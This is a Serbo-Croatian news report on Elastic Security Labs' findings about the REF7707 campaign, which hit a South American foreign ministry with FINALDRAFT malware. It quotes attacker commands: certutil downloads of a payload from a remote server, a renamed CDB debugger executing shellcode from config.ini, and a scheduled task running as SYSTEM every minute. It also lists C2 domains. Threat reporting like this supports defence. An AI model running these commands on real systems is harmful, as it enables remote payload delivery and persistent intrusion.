REF7707 Hakeri napadaju Windows i Linux mašine koristeći FINALDRAFT malware

Elastic Security Labs je nedavno predstavio sofisticiranu hakersku kampanju, nazvanu “REF7707”, koja cilja i Windows i Linux sisteme koristeći nove porodice malvera, uključujući FINALDRAFT, GUIDLOADER i PATHLOADER.

Ova kampanja je bila značajna po svojoj naprednoj taktici i slaboj operativnoj sigurnosti, što je dovelo do izlaganja dodatne infrastrukture u vlasništvu protivnika.

REF7707 kampanja je prvi put identifikovana krajem novembra 2024. godine, kada je Elastic Security Labs uočio grupu upozorenja o ponašanju krajnje tačke u Ministarstvu spoljnih poslova jedne južnoameričke zemlje.

Istraga je otkrila opsežnu kampanju s novim malicioznim softverom, sofisticiranim ciljanjem i zrelom radnom kadencom.

Dok su stručnjaci za sigurnost u Elastic Security Labs-u primijetili da su, uprkos tome što su pokazali visoku tehničku kompetenciju u nekim oblastima, napadači napravili taktičke previde koji su razotkrili pretprodukcijske uzorke malicioznog softvera i infrastrukturu.

Tok izvršenja

Primarni lanac izvršavanja započeo je upotrebom Microsoftove certutilaplikacije za preuzimanje datoteka sa udaljenog servera. Ovo je uključivalo komande kao što su:-

certutil -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\ProgramData
certutil -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\ProgramData

Ove datoteke su preuzete pomoću dodatka Remote Shell za Windows Remote Management ( WinrsHost.exe), što ukazuje da su napadači imali važeće mrežne akreditive za bočno kretanje.

FINALDRAFT je ključna komponenta REF7707 intrusion seta. Ima i Windows i Linux varijante i koristi neuobičajenu taktiku LOLBin (Living Off The Land Binary) zloupotrebljavajući Windows-potpisan program za otklanjanje grešaka CDB.exe, preimenovan u fontdrvhost.exe.

Ovaj binarni program izvršava maliciozni shellcode isporučen putem naoružane config.inidatoteke.

C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData

FINALDRAFT ubrizgava shellcode u procese poput mspaint.exeili conhost.exeako nije naveden ciljni parametar.

Postojanost je postignuta korištenjem planiranog zadatka koji se fontdrvhost.exesvake minute pozivao kao SISTEM:-

schtasks /create /RL HIGHEST /F /tn "\Microsoft\Windows\AppID\EPolicyManager\" /tr "C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData" /sc MINUTE /mo 1 /RU SYSTEM

FINALDRAFT uspostavlja komandu i kontrolu koristeći Microsoftov Graph API, stapajući se sa legitimnim organizacionim saobraćajem i izbegavajući detekciju zasnovanu na mreži.

Kampanja u velikoj mjeri koristi usluge oblaka i treće strane za komandu i kontrolu. U uzorcima malicioznog softvera identifikovani su domeni poput support.vmphere[.]comi .update.hobiter[.]com

Ovi domeni su dio infrastrukture u vlasništvu protivnika. U REF7707 kampanji napadači koriste novi maliciozni softver i iskorištavaju legitimne alate kako bi izbjegli otkrivanje.

Upotreba FINALDRAFT-a na Windows i Linux platformama pokazuje potrebu za robusnim mjerama sigurnosti na više platformi .

Izvor: CyberSecurityNews